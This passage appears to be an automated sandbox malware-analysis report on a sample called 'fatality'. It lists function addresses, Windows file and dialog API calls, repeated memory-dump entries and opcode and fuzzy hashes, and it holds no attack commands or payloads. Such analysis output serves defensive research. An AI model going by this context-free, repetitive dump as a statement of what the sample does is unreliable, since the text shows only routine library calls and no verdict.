                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2838827086-0
                                                                                                                                                            • Opcode ID: 652a81a0ebdd35b57d95f15aacec798d766bc3d70b6c1ddf47b8e45b5a47054a
                                                                                                                                                            • Instruction ID: bf8557a0c7f4d41a90428526f38c0138821d812c08c0fa30a0c9db363f3f7b6f
                                                                                                                                                            • Opcode Fuzzy Hash: 652a81a0ebdd35b57d95f15aacec798d766bc3d70b6c1ddf47b8e45b5a47054a
                                                                                                                                                            • Instruction Fuzzy Hash: 18311671904249AACF11DFA9C949AEEBBF5FF49310F104069E845A7251CB325E10CB61
                                                                                                                                                            Function 0090BA89 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1024 90ba89-90ba8f 1025 90ba91-90ba9c call 9091a8 1024->1025 1026 90baae-90bab2 1024->1026 1036 90ba9e-90baad call 908dcc 1025->1036 1027 90bab4 call 908b6f 1026->1027 1028 90bab9-90bac4 1026->1028 1027->1028 1031 90bac6-90bad0 1028->1031 1032 90badb-90baf5 1028->1032 1031->1032 1034 90bad2-90bada call 908dcc 1031->1034 1035 90baf7-90bafe 1032->1035 1032->1036 1034->1032 1035->1036 1038 90bb00-90bb17 call 90b691 1035->1038 1038->1036 1045 90bb19-90bb23 1038->1045 1045->1036
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                            • Opcode ID: b5617b791fe7c0fad0594e10101c1b5bacfea90203e32830b91812e5093e5a45
                                                                                                                                                            • Instruction ID: d1809c5cb11e9ad04114fd73955d7a02931ba116f37c29df6037a53a6380ac52
                                                                                                                                                            • Opcode Fuzzy Hash: b5617b791fe7c0fad0594e10101c1b5bacfea90203e32830b91812e5093e5a45
                                                                                                                                                            • Instruction Fuzzy Hash: 0411E971B04209AFDB10DF58D4417ED77E8EF40324F25409AE9089B2F2EB764D44DB40
                                                                                                                                                            Function 008EA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000001,00000001,?,008EA23A,?,008EA2E9,00000001,00000001,?,?,008EA175,?,00000001,00000000,?,?), ref: 008EA254
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,008EA23A,?,008EA2E9,00000001,00000001,?,?,008EA175,?,00000001,00000000), ref: 008EA280
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2673547680-0
                                                                                                                                                            • Opcode ID: f183041dc0546d74fed4836e5797e88b073861c9940d0ca0670b383c9c4cb662
                                                                                                                                                            • Instruction ID: 070267c513fbf9dc8b3a7ff37b41c464a725f332b8bbbc07b4533ea060a7c7ec
                                                                                                                                                            • Opcode Fuzzy Hash: f183041dc0546d74fed4836e5797e88b073861c9940d0ca0670b383c9c4cb662
                                                                                                                                                            • Instruction Fuzzy Hash: 2FE092315001689BCF10AB68CC05BD977A8FB1D7E1F048261FE44F3190D770DE44CAA1
                                                                                                                                                            Function 008FDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FDEEC
                                                                                                                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 008FDF03
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate_swprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3251159408-0
                                                                                                                                                            • Opcode ID: f107c1bd8f60a9c321572006c44255934251eb8f163dc7f2e2ce08244d8e868f
                                                                                                                                                            • Instruction ID: f20f5ba2a14d76cb12a6f357f823894e5820a196e0252b7d33b7f9c5e2743437
                                                                                                                                                            • Opcode Fuzzy Hash: f107c1bd8f60a9c321572006c44255934251eb8f163dc7f2e2ce08244d8e868f
                                                                                                                                                            • Instruction Fuzzy Hash: 22E09B7541438C26DF11B775DC06FAF376CAB16785F444451B304DB0F2D978D6119662
                                                                                                                                                            Function 00902B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00902BAA
                                                                                                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00902BB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1660781231-0
                                                                                                                                                            • Opcode ID: f21f988f671d5b186940304398b4ba48a809fbe5f19f487a62b9fbafed5d415e
                                                                                                                                                            • Instruction ID: fcd770ec3702ea3465bc46e8f5c035cc866a1a07366958be87a56fc1f2d4681f
                                                                                                                                                            • Opcode Fuzzy Hash: f21f988f671d5b186940304398b4ba48a809fbe5f19f487a62b9fbafed5d415e
                                                                                                                                                            • Instruction Fuzzy Hash: 19D022346683002CEC142F742C0FB98338EBDC3BB8BE086AAF820C58C1EE908080F011
                                                                                                                                                            Function 008E12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                            • Opcode ID: f548ec233742d225ba3437def321ebf76d77992f0a604d118f871664cf48ec02
                                                                                                                                                            • Instruction ID: 654787cbe36b663f9bd2ea3fb597988574862e86b225ec244b5255d2fb6f9e02
                                                                                                                                                            • Opcode Fuzzy Hash: f548ec233742d225ba3437def321ebf76d77992f0a604d118f871664cf48ec02
                                                                                                                                                            • Instruction Fuzzy Hash: 1EC0123A06C240BFCB010BB4DC09C2BBBA8ABAA312F04C908B0A5C0060C238C110EB11
                                                                                                                                                            Function 008E1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 76f004316ab74bf2889d07e7bd3391ae7c851344efd8c679d236784b70224b9b
                                                                                                                                                            • Instruction ID: 413592bbdceca82e09948d7ad95914eb00438cf88482e926e49d80fcd3fbd1d0
                                                                                                                                                            • Opcode Fuzzy Hash: 76f004316ab74bf2889d07e7bd3391ae7c851344efd8c679d236784b70224b9b
                                                                                                                                                            • Instruction Fuzzy Hash: 6EC1B230A002949FEF15DF69C88CBA97BA5FF56320F1841B9EC46DB392DB309944CB61
                                                                                                                                                            Function 008E3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: cdd1dd386b09777dc3e74b20ed13c709a7f0700efa80d06f078a6ff79be34429
                                                                                                                                                            • Instruction ID: 7cc29b0f5baf7b5d2494c0363ee7a702fbb76a9a8dc451a1008ee3d076a39f98
                                                                                                                                                            • Opcode Fuzzy Hash: cdd1dd386b09777dc3e74b20ed13c709a7f0700efa80d06f078a6ff79be34429
                                                                                                                                                            • Instruction Fuzzy Hash: 4771C171500B859ECB35DB75C8499E7B7E9FF16300F40092EE2ABC7641DA326A88DF12
                                                                                                                                                            Function 008E9A74 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,008E9A50,?,?,00000000,?,?,008E8CBC,?), ref: 008E9BAB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                            • Opcode ID: d9f29b9f0b2454847ca9e8bcf0cb1e9689619212c3d5f9669d9741f485e2c42f
                                                                                                                                                            • Instruction ID: 45b2ceb588ada0ac358fa36fff04cdf5ffef4b7949055144dc0e5f325ee12af0
                                                                                                                                                            • Opcode Fuzzy Hash: d9f29b9f0b2454847ca9e8bcf0cb1e9689619212c3d5f9669d9741f485e2c42f
                                                                                                                                                            • Instruction Fuzzy Hash: 0041DF306143A5CFDB24DF1AE5844AAB7E6FFD6320F148A6DE8D1C3260D7F0AC448A51
                                                                                                                                                            Function 008E8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E8289
                                                                                                                                                              • Part of subcall function 008E13DC: __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                              • Part of subcall function 008EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008EA598
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog$CloseFind
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506663941-0
                                                                                                                                                            • Opcode ID: 4d31f6cac1e60aa14ab5f4121d5835d869bdca3ab3da22746892e3ef77d8fdd9
                                                                                                                                                            • Instruction ID: d24186e8c6b999f0e1aa5dec2c61f920cb6e4969714fc604781ede4f0a6428ac
                                                                                                                                                            • Opcode Fuzzy Hash: 4d31f6cac1e60aa14ab5f4121d5835d869bdca3ab3da22746892e3ef77d8fdd9
                                                                                                                                                            • Instruction Fuzzy Hash: 8841D6719446989ADB20DBA5CC55AEEB3A8FF12304F4400EAE18EE7192EB705EC4CB11
                                                                                                                                                            Function 008E98E0 Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 008E995F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 05a43eb8c8bb41d9623d836baf21e975dd8f4fb58705ce7d863e30d473904088
                                                                                                                                                            • Instruction ID: 495f7f447fcc4e028412d27cf9d2e3d4b03370e918d4db68af4bf2e24d287ab9
                                                                                                                                                            • Opcode Fuzzy Hash: 05a43eb8c8bb41d9623d836baf21e975dd8f4fb58705ce7d863e30d473904088
                                                                                                                                                            • Instruction Fuzzy Hash: 9D311530548385AFE720AB25CC45BEABFE4FB06320F204B19F9E1D61D2D3E49944CB91
